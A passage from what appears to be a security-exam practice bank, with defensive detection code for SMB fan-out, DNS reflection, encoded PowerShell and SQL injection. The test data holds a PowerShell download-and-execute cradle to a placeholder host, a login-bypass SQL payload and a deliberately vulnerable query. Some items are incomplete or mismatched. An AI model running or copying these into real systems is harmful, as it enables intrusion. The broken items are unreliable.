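    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port)) for ip in FAKE_DNS[host]]


if __name__ == "__main__":
    for url in ("http://169.254.169.254/latest/meta-data/", "http://localhost/admin",
                "https://images.example.com/cat.png", "https://cdn.example.net/cat.png"):
        print(url, "->", check_fetch_url(url, fake_resolver)[:2])
```

Connect to one of the returned addresses and send the allowed hostname in the Host header rather than letting the HTTP client resolve the name a second time, and disable automatic redirects (or run the check on every redirect target); otherwise the first check can be bypassed.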
Parameterized queries and prepared statements are effective because they separate SQL structure from user input: the database engine parses and compiles the statement before the parameter values are bound, so a value such as ' OR '1'='1 is compared as a literal string and is never reinterpreted as SQL. Input validation still has a role in rejecting malformed values early, but it is the parameter binding that removes the injection path.
Exam trap
The trap here is that all four options are correct, so candidates must recognize that the question expects them to select all four, rather than being misled into thinking one is incorrect due to common misconceptions about input validation being insufficient alone.
A CFO at a mid-sized company receives an urgent email that appears to come from the CEO's email address, requesting an immediate wire transfer of $50,000 to a new vendor for a time-sensitive project. The email address displayed is 'ceo@cornpany.com' instead of the legitimate 'ceo@company.com'. The CFO follows the instruction and initiates the transfer. Later, the real CEO denies sending such a request. Which of the following security controls would have been MOST effective in preventing this type of attack from succeeding?
A.Deploying a stronger email spam filter that blocks all emails from unrecognized domains
B.Requiring multi-factor authentication (MFA) for all corporate email accounts
C.Implementing a policy that all financial transfers over a certain threshold must be verbally verified via a known phone number before execution
D.Enabling Transport Layer Security (TLS) encryption for all outgoing email communications
AnswerC
An out-of-band verification procedure, such as calling the requester on a known phone number, directly addresses the impersonation risk by confirming the request through an independent communication channel.
Why this answer
Option C is correct because the attack is a business email compromise (BEC) using a lookalike domain. A policy requiring verbal verification via a known phone number adds a human out-of-band check that bypasses the email channel entirely, preventing the fraudulent transfer even if the email appears legitimate. This control directly addresses the social engineering aspect of the attack, which technical controls alone cannot fully mitigate.
Exam trap
The trap here is that candidates often choose a technical control like MFA or spam filters, overlooking that the attack exploits human trust and domain spoofing rather than account compromise, so the most effective control is a procedural one that bypasses the email channel entirely.
How to eliminate wrong answers
Option A is wrong because a stronger spam filter would not block the email if the lookalike domain 'cornpany.com' is a registered domain that passes SPF/DKIM checks; the filter would only block unrecognized domains if explicitly configured, but attackers often use domains that appear similar to trusted ones. Option B is wrong because MFA protects against credential theft or unauthorized access to email accounts, but in this scenario the attacker spoofed the CEO's email address without compromising the account, so MFA does not prevent the spoofed email from being sent or received. Option D is wrong because TLS encryption secures the communication channel between mail servers, preventing eavesdropping or tampering in transit, but it does not authenticate the sender's identity or prevent spoofed emails from being delivered.
A file server used by a shared service account begins renaming documents, deleting shadow copies, and creating outbound SMB connections to many internal hosts. The SOC suspects the malware may be spreading while also encrypting data. Which two actions are the best immediate containment steps? Select two.
Select 2 answers
A.Isolate the affected server from the network through EDR or switch controls.
B.Disable or reset the compromised service account and revoke active sessions.
C.Restore the server from backup before taking any containment action.
D.Delete the suspicious files from the server to stop the encryption process.
E.Inform users that the incident is likely a false positive and continue monitoring.
AnswersA, B
Isolation is the fastest way to stop further encryption and prevent the suspected spread from reaching more systems. When a server is actively affecting files and reaching out to other hosts, limiting its network access is the most effective containment measure available immediately.
Why this answer
Isolating the affected server from the network via EDR or switch controls is correct because it immediately stops the malware from spreading to other hosts through SMB connections and prevents further encryption of network-accessible files. This containment step breaks the lateral movement and data exfiltration channels without relying on potentially compromised credentials or incomplete cleanup.
Exam trap
The trap here is that candidates may think deleting files or restoring from backup is an immediate containment step, but in reality, containment must first stop the active threat (network isolation and credential revocation) before any recovery actions are taken.
A workstation suddenly begins making SMB connections to many internal servers within a few minutes. What is the best immediate response?
A.Allow the traffic because SMB is a normal file-sharing protocol.
B.Isolate the workstation from the network for containment.
C.Delete the local event logs to reduce alert noise.
D.Disable all SMB services on every server immediately.
AnswerB
Network isolation limits possible lateral movement and helps stop a compromised host from touching additional systems while the event is investigated.
Why this answer
Option B is correct because the workstation's sudden SMB connections to many internal servers strongly indicate compromise, such as ransomware or worm propagation. Isolating the workstation immediately contains the threat, preventing lateral movement and further damage while preserving forensic evidence.
Exam trap
The trap here is that candidates may think SMB traffic is always benign because it is a legitimate protocol, failing to recognize that a sudden spike in SMB connections to multiple internal servers is a red flag for active lateral movement.
How to eliminate wrong answers
Option A is wrong because allowing the traffic ignores the anomalous behavior; SMB is normal for file sharing, but a sudden burst of connections to many servers is a classic sign of automated malicious activity like ransomware encryption or worm spread. Option C is wrong because deleting event logs destroys critical forensic evidence needed to investigate the incident, and it does not stop the malicious activity. Option D is wrong because disabling all SMB services on every server is an overly drastic, disruptive response that would break legitimate business operations and is not a targeted containment step.
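The "sudden burst of SMB connections to many internal servers" in the two questions above is what a fan-out detector looks for. The following is an added example of that detection logic, not code from the question bank: it reads constructed NetFlow-style records (time, source, destination, destination port), counts how many distinct port-445 destinations each source reaches inside a sliding five-minute window, and reports sources over a threshold. The window and threshold values are assumptions to be tuned against a site's own baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _build_sample():
    """Constructed flow records: one workstation touches 30 servers in 30 s,
    another touches two file servers over several minutes."""
    rows = [f"2024-05-01T09:00:{i:02d},10.1.20.15,10.1.5.{10 + i},445" for i in range(30)]
    rows += ["2024-05-01T09:00:05,10.1.20.16,10.1.5.10,445",
             "2024-05-01T09:03:00,10.1.20.16,10.1.5.11,445",
             "2024-05-01T09:03:10,10.1.20.16,10.1.5.11,443"]
    return rows


SAMPLE_FLOWS = _build_sample()


def parse_flows(lines):
    """Yield (timestamp, src, dst, dport) from 'time,src,dst,dport' lines."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport = line.split(",")
        yield datetime.fromisoformat(ts), src, dst, int(dport)


def smb_fanout(flows, window=timedelta(minutes=5), threshold=20):
    """Return {src: peak distinct SMB destinations within any window} for
    sources whose peak reaches the threshold."""
    per_src = defaultdict(list)                  # src -> [(ts, dst), ...]
    for ts, src, dst, dport in flows:
        if dport == 445:
            per_src[src].append((ts, dst))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        peak, start = 0, 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            peak = max(peak, distinct)
        if peak >= threshold:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for host, peak in smb_fanout(parse_flows(SAMPLE_FLOWS)).items():
        print(f"isolate {host}: {peak} distinct SMB targets in one window")
```

Counting distinct destinations rather than raw connection volume is what separates a host enumerating the network from a host copying many files to one server. The alert is a containment trigger for the host, not for SMB everywhere, which is why option D is the wrong reaction.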
A vulnerability scan finds a critical flaw on an internet-facing VPN appliance and says public exploit code is already available. Which issue should be remediated first?
A.A low-severity finding on an internal test server with no network access
B.A critical flaw on an internet-facing VPN appliance with known exploit code
C.A cosmetic configuration warning on a printer management interface
D.A medium-severity issue on a device that is powered off and not in service
AnswerB
This finding is both severe and exposed, which makes exploitation much more likely and business impact potentially high.
Why this answer
The critical flaw on an internet-facing VPN appliance with known public exploit code represents the highest risk because it combines a severe vulnerability, direct exposure to the internet, and immediate weaponization potential. VPN appliances are common attack vectors for initial access, and an exploit in the wild means attackers can compromise the device without advanced skills, leading to potential network breach and lateral movement.
Exam trap
The trap here is that candidates may prioritize by severity alone without factoring in exploitability, exposure, or asset criticality—leading them to choose a medium or low finding that is technically less urgent but appears more manageable.
How to eliminate wrong answers
Option A is wrong because a low-severity finding on an internal test server with no network access poses negligible risk—it is isolated and lacks connectivity, so exploitation is practically impossible. Option C is wrong because a cosmetic configuration warning on a printer management interface is not a security vulnerability; it is a non-functional issue that does not affect confidentiality, integrity, or availability. Option D is wrong because a medium-severity issue on a device that is powered off and not in service cannot be exploited—the device is not operational, so the finding has zero current risk.
EDR on a workstation shows winword.exe spawning powershell.exe with hidden, no-profile, and encoded arguments. No new executable is written to disk. Minutes later, a scheduled task creation is blocked, but the same host continues making HTTPS requests to a cloud IP address. Which malware category best fits this behavior?
A.Trojan, because the malicious activity likely started from a user-opening event.
B.Worm, because the host is making repeated outbound network connections.
C.Rootkit, because the process is using hidden commands and network connections.
D.Fileless attack, because the payload is executed in memory using legitimate scripting tools and leaves little on disk.
AnswerD
Fileless attack is the best fit because the sequence uses trusted built-in tools, encoded PowerShell, and no obvious executable drop on disk. The suspicious behavior happens in memory and through script interpretation, which makes detection harder than with traditional malware files. The blocked scheduled task and later HTTPS beaconing are consistent with in-memory execution and persistence attempts after initial delivery.
Why this answer
The correct answer is D because the attack uses legitimate tools (winword.exe spawning powershell.exe) with hidden, no-profile, and encoded arguments to execute a payload entirely in memory, never writing a new executable to disk. This is the hallmark of a fileless attack, which relies on in-memory execution and living-off-the-land binaries (LOLBins) to evade traditional antivirus and disk-based detection. The subsequent scheduled task creation block and persistent HTTPS connections to a cloud IP further indicate a fileless malware that establishes command-and-control (C2) without dropping files.
Exam trap
The trap here is that candidates see 'hidden commands' and 'network connections' and incorrectly associate them with a rootkit, but the 'hidden' refers to PowerShell's `-WindowStyle Hidden` parameter, not kernel-level hiding, and the network connections are standard HTTPS C2 traffic, not a rootkit's stealthy communication.
How to eliminate wrong answers
Option A is wrong because a Trojan typically requires a user to execute a malicious file that is written to disk, but here no new executable is written to disk and the activity starts from a legitimate Office process spawning PowerShell in memory. Option B is wrong because a Worm self-replicates and spreads automatically across networks, often exploiting vulnerabilities; the repeated outbound HTTPS connections here are for C2 communication, not for self-propagation. Option C is wrong because a Rootkit is designed to hide its presence by modifying the operating system kernel or drivers, whereas this attack uses hidden PowerShell arguments (a command-line flag) and does not involve kernel-level concealment or driver installation.
A file server suddenly renames documents with a new extension and displays a note demanding payment in cryptocurrency to restore access. What type of malware is most likely involved?
A.Ransomware
B.Spyware
C.Worm
D.Rootkit
AnswerA
This is the classic symptom pattern for ransomware. Files are renamed or encrypted, access is disrupted, and the attacker demands payment for recovery. The ransom note and the sudden file changes together make ransomware the best answer.
Why this answer
Ransomware is designed to encrypt files on a system, making them inaccessible, and then demand a ransom—typically in cryptocurrency—to restore access. The sudden renaming of documents with a new extension is a hallmark of ransomware encryption, as it appends a custom extension to indicate the files have been locked. The displayed note demanding payment confirms the extortion motive, which is unique to ransomware among the given options.
Exam trap
The trap here is that candidates may confuse ransomware with other malware types that alter files or display messages, but only ransomware specifically encrypts files and demands a ransom for decryption.
How to eliminate wrong answers
Option B (Spyware) is wrong because spyware is designed to covertly monitor user activity and collect sensitive information, not to encrypt or rename files or demand ransom. Option C (Worm) is wrong because a worm is a self-replicating malware that spreads across networks without requiring user interaction, and it typically does not encrypt files or display ransom notes. Option D (Rootkit) is wrong because a rootkit is a type of malware that hides its presence and provides persistent privileged access to a system, but it does not perform file encryption or extortion.
A public web server becomes unreachable during an outage. Netflow shows a large number of DNS responses arriving from many open resolvers, while the server itself only sent tiny spoofed DNS queries with the victim's address as the source. What type of attack is this?
A.DNS zone transfer abuse against the organization.
This is DNS amplification reflection because the attacker spoofs the victim's IP address in small requests to open resolvers, causing large responses to be sent to the victim instead. The result is a bandwidth flood that can make the server unreachable even though the victim never initiated the traffic. The key clues are tiny queries, spoofed source addresses, many resolvers, and a high volume of unsolicited responses. This is a classic distributed denial-of-service pattern.
Why this answer
This is a classic DNS amplification reflection DDoS attack. The attacker sends small DNS queries with a spoofed source IP (the victim's address) to open resolvers, which then send large DNS responses to the victim, overwhelming its bandwidth. The NetFlow data shows the server receiving many large DNS responses while only sending tiny spoofed queries, confirming the amplification and reflection vectors.
Exam trap
The trap here is confusing the direction of traffic: candidates may think the server is the attacker because it sends queries, but the spoofed source IP and large incoming responses reveal it is the victim of a reflection attack.
How to eliminate wrong answers
Option A is wrong because DNS zone transfer abuse involves an unauthorized request for a full zone file from a DNS server, not a flood of responses from open resolvers. Option C is wrong because a replay attack captures and retransmits a valid session token to impersonate a user, which does not involve DNS traffic or bandwidth exhaustion.
A web service begins experiencing severe latency. Netflow shows thousands of short DNS queries leaving the attacker network, while a much larger volume of DNS responses is arriving at the victim’s public IP address from many open resolvers. Which attack is most likely occurring?
A.Replay attack using previously captured packets
B.DNS reflection and amplification denial-of-service attack
C.ARP poisoning that redirects local traffic on a LAN
D.Session hijacking through stolen authentication cookies
AnswerB
This is the best match. The attacker sends small DNS requests that cause open resolvers to send much larger responses to the victim's IP address. Because the victim receives the responses, the attack uses reflection; because the responses are much larger than the requests, it also uses amplification. The result is bandwidth exhaustion and severe latency, which are common symptoms of a volumetric DDoS attack.
Why this answer
The attack described is a DNS reflection and amplification denial-of-service attack. The attacker sends thousands of short DNS queries with a spoofed source IP (the victim's IP) to many open resolvers, which then send large DNS responses to the victim, overwhelming its bandwidth. NetFlow shows a small volume of queries leaving the attacker and a much larger volume of responses arriving at the victim, which is the hallmark of amplification (small request, large response) combined with reflection (responses from third-party resolvers).
Exam trap
The trap here is that candidates may confuse the high volume of responses arriving at the victim with a simple volumetric attack, missing the key indicators of reflection (responses from many different IPs) and amplification (small queries generating large responses), which uniquely identify a DNS reflection/amplification DDoS.
How to eliminate wrong answers
Option A is wrong because a replay attack involves capturing and retransmitting valid packets to impersonate a user or repeat a transaction, not generating massive traffic from open resolvers to a victim. Option C is wrong because ARP poisoning is a local network attack that manipulates ARP tables to intercept traffic on a LAN, not a volumetric DDoS attack using DNS over the internet. Option D is wrong because session hijacking through stolen cookies targets a user's authenticated session, not the network-level flooding of a victim with DNS responses.
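The two DNS questions above describe the same flow pattern seen from the victim's side: responses from port 53 arriving from many distinct addresses, far exceeding the bytes of queries the victim itself sent. The following is an added example of checking for that pattern over constructed NetFlow-style records (source, destination, source port, destination port, bytes); it is not code from the question bank, and the thresholds and the documentation-range addresses in the sample are assumptions.

```python
from collections import defaultdict


def _build_sample():
    """Constructed flows for one interval: 40 open resolvers each deliver
    120 kB of responses to 203.0.113.5, which itself sent a single 70-byte
    query; 203.0.113.9 is an unrelated host doing an ordinary lookup."""
    rows = [f"198.51.100.{i},203.0.113.5,53,33001,120000" for i in range(1, 41)]
    rows += ["203.0.113.5,203.0.113.2,40001,53,70",
             "203.0.113.2,203.0.113.5,53,40001,130",
             "203.0.113.9,203.0.113.2,40002,53,65",
             "203.0.113.2,203.0.113.9,53,40002,120"]
    return rows


SAMPLE_FLOWS = _build_sample()


def parse_flows(lines):
    """Yield (src, dst, sport, dport, bytes) from 'src,dst,sport,dport,bytes' lines."""
    for line in lines:
        if line.strip():
            src, dst, sport, dport, nbytes = line.strip().split(",")
            yield src, dst, int(sport), int(dport), int(nbytes)


def dns_reflection_victims(flows, min_sources=20, min_ratio=10.0):
    """Hosts receiving DNS responses from many distinct addresses while the
    bytes they get back dwarf the bytes of queries they sent (reflection
    plus amplification). Returns {host: {"responders": n, "amplification": r}}."""
    query_bytes_out = defaultdict(int)      # host -> bytes sent to port 53
    response_bytes_in = defaultdict(int)    # host -> bytes received from port 53
    responders = defaultdict(set)           # host -> distinct port-53 sources
    for src, dst, sport, dport, nbytes in flows:
        if dport == 53:
            query_bytes_out[src] += nbytes
        if sport == 53:
            response_bytes_in[dst] += nbytes
            responders[dst].add(src)
    alerts = {}
    for host, inbytes in response_bytes_in.items():
        ratio = inbytes / max(query_bytes_out[host], 1)   # avoid dividing by zero
        if len(responders[host]) >= min_sources and ratio >= min_ratio:
            alerts[host] = {"responders": len(responders[host]),
                            "amplification": round(ratio, 1)}
    return alerts


if __name__ == "__main__":
    for host, info in dns_reflection_victims(parse_flows(SAMPLE_FLOWS)).items():
        print(f"{host}: {info['responders']} responders, x{info['amplification']} bytes in vs out")
```

A replay, ARP poisoning or session hijack leaves no such signature: none of them produces port-53 traffic from dozens of unrelated sources, which is the discriminator the "eliminate wrong answers" section relies on. Mitigation is upstream (rate limiting and scrubbing at the provider, response-rate limiting on resolvers you operate); the victim cannot filter its way out of a saturated link.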
Users in a warehouse report an SMS claiming a missed delivery. The link opens a login page that closely matches the company portal, and several users later receive unauthorized password reset emails. What attack is most likely?
A.Smishing, because the malicious lure is delivered through text messaging.
B.Vishing, because the attackers are likely trying to get a callback from the victims.
C.Spear phishing, because the message appears customized for warehouse employees.
D.Baiting, because the fake delivery notice tempts users to click for a reward.
AnswerA
Smishing is SMS-based phishing. The deceptive text message and fake portal are both strong indicators that the attacker is targeting users through mobile text communication.
Why this answer
The attack is smishing because the initial lure is delivered via SMS (Short Message Service), directing victims to a fraudulent login page. This aligns with the definition of smishing, a form of phishing that uses text messages to trick recipients into revealing sensitive information. The subsequent unauthorized password reset emails confirm credential compromise, which is the typical goal of smishing attacks.
Exam trap
CompTIA often tests the distinction between attack vectors (SMS vs. email vs. voice) rather than the content of the lure, so candidates may confuse smishing with spear phishing if they focus on the customized delivery notice instead of the delivery method.
How to eliminate wrong answers
Option B is wrong because vishing (voice phishing) relies on voice calls or voicemail prompts to elicit a callback, not an SMS with a link. Option C is wrong because spear phishing involves highly targeted, personalized emails, not SMS messages, and the scenario does not indicate the message was customized beyond a generic delivery notice. Option D is wrong because baiting involves offering a physical or digital lure (e.g., a free USB drive or download) to entice action, not a deceptive SMS link to a fake login page.
Employees in a lobby report that their phones automatically connected to a wireless network named "CorpWiFi." Soon after, they were prompted to sign in through a web page that did not look like the normal company portal. What attack is most likely?
A.Bluetooth pairing attack
B.Evil twin
C.NFC relay attack
D.MAC flooding
AnswerB
An evil twin is a rogue wireless access point that imitates a legitimate SSID so victims connect to it by mistake. The fake network name and suspicious sign-in page strongly suggest a malicious clone of the real Wi-Fi.
Why this answer
The scenario describes an evil twin attack, where a rogue access point (AP) broadcasts an SSID identical to the legitimate corporate network ("CorpWiFi"). Phones that remember the real network auto-join the clone when its signal is stronger or closer, and the attacker then serves a fake captive portal designed to capture credentials or other sensitive data. This works because nothing in an open 802.11 association authenticates the access point to the client; only the SSID has to match.
Exam trap
The trap here is that candidates may confuse an evil twin with a simple misconfiguration or a phishing attack, but the key indicator is the automatic connection to a network with the same SSID followed by a suspicious login page, which directly points to a rogue AP impersonating the legitimate network.
How to eliminate wrong answers
Option A is wrong because a Bluetooth pairing attack requires active pairing initiation and does not involve a web-based sign-in prompt or automatic Wi-Fi connection. Option C is wrong because an NFC relay attack extends the range of an NFC transaction (e.g., contactless payment) and does not create a fake Wi-Fi network or captive portal. Option D is wrong because MAC flooding is a Layer 2 attack that floods a switch's CAM table to force it into hub mode, enabling packet sniffing; it does not involve a rogue wireless network or a sign-in page.
During a conference, several employees connect to a wireless network named the same as the hotel's guest Wi-Fi. Shortly after connecting, they receive certificate warnings when accessing the company portal, and packet capture shows a nearby laptop advertising the same SSID and relaying traffic. What type of attack is most likely?
A.Rogue access point or evil twin attack, because a fake wireless network impersonates a legitimate one.
B.Replay attack, because previously captured wireless frames are being resent to the network.
C.DNS poisoning, because users are being sent to the wrong website through altered name resolution.
D.Denial of service, because users are simply unable to connect reliably.
AnswerA
An evil twin duplicates the SSID of a trusted network to lure clients into connecting to an attacker-controlled access point.
Why this answer
The attack described is an evil twin (a type of rogue access point) because the attacker sets up a laptop broadcasting the same SSID as the hotel's legitimate guest Wi-Fi. When employees connect to this fake network, the attacker can intercept traffic and present a fraudulent certificate for the company portal, triggering certificate warnings. The packet capture confirming the laptop is relaying traffic proves it is acting as a man-in-the-middle, not merely a passive listener.
Exam trap
The trap here is that candidates confuse an evil twin with a simple rogue access point, but the key differentiator is that the evil twin specifically impersonates a legitimate SSID to trick users, while a rogue AP might use a different SSID; the certificate warning and relayed traffic confirm the man-in-the-middle role, not just unauthorized access.
How to eliminate wrong answers
Option B is wrong because a replay attack involves capturing and retransmitting valid wireless frames (e.g., authentication or data packets) to impersonate a user or gain unauthorized access, but here the attacker is actively advertising a fake SSID and relaying live traffic, not replaying old frames. Option C is wrong because DNS poisoning alters DNS resolution to redirect users to a malicious site, but the scenario describes certificate warnings on the company portal and a laptop relaying traffic, not a manipulated DNS response. Option D is wrong because a denial of service attack would prevent connectivity or degrade performance, whereas users are successfully connecting to the fake network and receiving certificate warnings, indicating active interception rather than service disruption.
A SOC analyst investigates a host after an employee opens an invoice attachment. The endpoint shows PowerShell running in a hidden window, no new executable files are created on disk, and the same suspicious activity returns after a reboot. What is the most likely attack type?
A.Fileless attack, because the malicious activity is operating primarily in memory and using native tools.
B.Ransomware, because the user opened an email attachment.
C.Worm, because PowerShell is a common scripting tool.
D.Rootkit, because the attacker is hiding the process from normal tools.
AnswerA
Fileless attacks rely on legitimate scripting engines and memory-resident techniques instead of dropping obvious executable files. Hidden PowerShell activity, repeated behavior after reboot, and the absence of a new binary are strong signs that the attacker is leveraging trusted operating system components. This approach often helps malware evade traditional file-based scanning while still achieving persistence or command execution.
Why this answer
The correct answer is A because the attack is fileless: it runs PowerShell in a hidden window without writing new executables to disk, and persistence after reboot indicates the malicious code is stored in the registry or a script that loads into memory at startup. Fileless attacks leverage native tools like PowerShell, WMI, or .NET to execute payloads entirely in memory, bypassing traditional file-based detection.
Exam trap
The trap here is that candidates confuse 'fileless' with 'no persistence' or assume any attachment-based attack is ransomware, but the key indicators—hidden PowerShell, no new executables, and post-reboot persistence—point directly to a fileless attack using native Windows tools.
How to eliminate wrong answers
Option B is wrong because ransomware typically encrypts files and demands payment, but the scenario describes no encryption, no ransom note, and no new executables—only persistent in-memory PowerShell activity. Option C is wrong because a worm self-replicates across networks without user interaction, while this attack requires the user to open an invoice attachment and shows no lateral movement or self-propagation.
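Both fileless questions above (the winword.exe to powershell.exe chain and the hidden PowerShell that survives reboot) turn on the same three command-line indicators: an Office parent spawning a script host, a hidden window with no profile, and an encoded command. The following is an added example of triaging such process-creation events, not code from the question bank: the events are constructed in the shape of Sysmon/EDR process-creation records, and the decoder shows that `-EncodedCommand` is simply base64 over UTF-16LE text, so an analyst can read the payload without running it. The download-cradle string and the `example.invalid` host are assumptions.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of a parameter name, so match
# -e, -ec, -enc, -encodedcommand and the forms in between.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
_HIDDEN_RE = re.compile(r"(?i)-w(?:i[a-z]*)?\s+h(?:idden)?\b")   # -w hidden, -WindowStyle Hidden
_NOPROFILE_RE = re.compile(r"(?i)-nop[a-z]*\b")                    # -nop, -NoProfile


def decode_encoded_command(b64):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))            # tolerate stripped padding
    return raw.decode("utf-16le")


def triage_event(ev):
    """Return (findings, decoded_command) for one process-creation event."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    findings, decoded = [], None
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"office parent {parent} spawned {image}")
    if _HIDDEN_RE.search(cmd):
        findings.append("hidden window")
    if _NOPROFILE_RE.search(cmd):
        findings.append("no profile")
    m = _ENC_RE.search(cmd)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
            findings.append("encoded command")
        except (ValueError, UnicodeDecodeError):
            findings.append("undecodable encoded argument")
    return findings, decoded


# Constructed events. The first mirrors the exam scenario; the second is a
# benign scheduled backup launched from Explorer, included to show it is not flagged.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/a.ps1')"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -NonI -W Hidden -Enc {_B64}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        findings, decoded = triage_event(ev)
        print(ev["CommandLine"][:60], "->", findings or "clean")
        if decoded:
            print("   decoded:", decoded)
```

Nothing here inspects the disk, which is the point: the evidence for a fileless chain lives in process lineage and command lines, so Script Block Logging and EDR process telemetry are what make it detectable. Persistence after reboot (the second question) would show up the same way, with the parent being a service host, WMI or a registry-triggered launcher instead of WINWORD.EXE.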
An employee receives a text message saying their payroll account is locked and asks them to tap a link and enter a one-time passcode. What type of attack is this?
A.Phishing
B.Smishing
C.Vishing
D.Baiting
AnswerB
Smishing is phishing delivered by SMS or another text messaging service. The attacker uses urgency and a fake account-lock message to trick the user into clicking a malicious link and giving away a one-time code.
Why this answer
Smishing (SMS phishing) is the correct classification because the attack vector is a text message (SMS) that lures the recipient into tapping a link and entering a one-time passcode. Unlike generic phishing which uses email, smishing specifically exploits SMS trust and the limited screen real estate of mobile devices to bypass security awareness.
Exam trap
The trap here is that candidates confuse smishing with generic phishing because both involve a link and credential theft, but the exam specifically tests the delivery method (SMS vs. email) as the distinguishing factor.
How to eliminate wrong answers
Option A (Phishing) is wrong because, in the exam's taxonomy, a bare "phishing" option refers to the email-delivered form; when the more specific SMS variant (smishing) is offered, it is the better answer. Option C (Vishing) is wrong because vishing uses voice calls or voicemail, not text messages. Option D (Baiting) is wrong because baiting involves offering a physical or digital lure (e.g., a free USB drive or download) to trick the victim, not a direct message requesting credentials.
A SOC analyst reviews a suspicious email about an overdue invoice. The display name matches a known supplier, but the envelope sender is from a free webmail domain, and the Reply-To address uses a look-alike domain with one swapped letter. The message also includes a company logo and a PDF attachment. Which two findings are the strongest indicators of a phishing attempt? Select two.
Select 2 answers
A.The display name matches the supplier, but the envelope sender is from a free webmail provider.
B.The message was transmitted over TLS to the recipient's mail gateway.
C.The Reply-To address uses a look-alike domain with one swapped letter in the brand name.
D.The email contains a PDF invoice attachment with a normal business filename.
E.The message includes the supplier's logo and a standard-looking signature block.
AnswersA, C
A familiar display name can be copied easily, so it is not trustworthy by itself. An envelope sender using a free webmail provider is inconsistent with a legitimate supplier invoice workflow and strongly suggests impersonation. Attackers often rely on this mismatch to bypass casual review while making the message appear routine.
Why this answer
Option A is correct because the envelope sender (the actual origin address in the SMTP MAIL FROM command) being from a free webmail domain while the display name matches a known supplier is a classic phishing red flag. Legitimate business invoices are almost never sent from free webmail providers like Gmail or Yahoo, as organizations use their own domains for official correspondence. This mismatch between the visible display name and the actual sender address indicates spoofing.
Exam trap
CompTIA often tests the distinction between the visible display name and the actual envelope sender, as candidates may mistakenly focus on the attachment or logo as phishing indicators rather than the sender address mismatch.
Which four of the following are common indicators of a phishing attack? (Choose four.)
Select 4 answers
Urgent or threatening language demanding immediate action
Spoofed sender email address that mimics a legitimate domain
Unsolicited attachment or link that prompts credential entry
Presence of a digital signature from a trusted certificate authority
Grammatical errors and poor formatting in the message body
A request for sensitive information via a secure web portal
Why this answer
These four options are correct because they represent classic hallmarks of phishing attacks. Urgent or threatening language is a social engineering tactic to bypass rational thought. Spoofed sender addresses exploit trust in familiar domains.
Unsolicited attachments or links are the primary delivery mechanism for phishing payloads. Grammatical errors and poor formatting often indicate a lack of professional quality control typical of legitimate organizations.
Exam trap
The exam often tests the misconception that technical security features like digital signatures or HTTPS encryption automatically indicate legitimacy, when in fact attackers can obtain valid certificates for their own domains and sign their own messages, so these features prove only who controls the sending domain, not that the request is genuine.
A web login form returns access after a tester enters `' OR '1'='1'--` into the username field. What type of attack is this?
A.Cross-site scripting
B.SQL injection
C.Session hijacking
D.Insecure deserialization
AnswerB
SQL injection happens when attacker input changes the meaning of a database query. The payload forces the login check to evaluate as true, which can bypass authentication.
Why this answer
The input `' OR '1'='1'--` is a classic SQL injection payload that manipulates the SQL query logic. By injecting a single quote to break out of the string context, the `OR '1'='1'` condition makes the WHERE clause always true, and the `--` comments out the rest of the query. This bypasses authentication because the database returns a valid row, granting access without a correct password.
Exam trap
The trap here is that candidates may confuse SQL injection with cross-site scripting because both involve injecting malicious input, but SQL injection targets the database layer via SQL syntax, while XSS targets the browser via HTML/JavaScript.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into web pages viewed by other users, not manipulating database queries to bypass authentication. Option C is wrong because session hijacking involves stealing or predicting a valid session token (e.g., via packet sniffing or session fixation) to impersonate an authenticated user, not altering the login query logic.
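The login bypass above, and the parameterized-query defence discussed earlier on this page, side by side as an added example (not code from the question bank). It uses Python's built-in `sqlite3` with an in-memory table so the same payload can be run against both versions; the table and the stored hash value are assumptions. The vulnerable version is deliberately kept vulnerable to show what the page describes.

```python
import sqlite3

PAYLOAD = "' OR '1'='1'--"   # the input from the question


def open_demo_db():
    """In-memory table with one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'hash-of-correct-pw')")
    con.commit()
    return con


def build_vulnerable_sql(username, password_hash):
    # String concatenation: the input becomes part of the SQL grammar, so a
    # quote ends the string and '--' comments out the password check.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password_hash = '" + password_hash + "'")


def login_vulnerable(con, username, password_hash):
    return con.execute(build_vulnerable_sql(username, password_hash)).fetchone() is not None


def login_parameterized(con, username, password_hash):
    # The statement is compiled with placeholders first; the values are bound
    # afterward and can only ever be data, never SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
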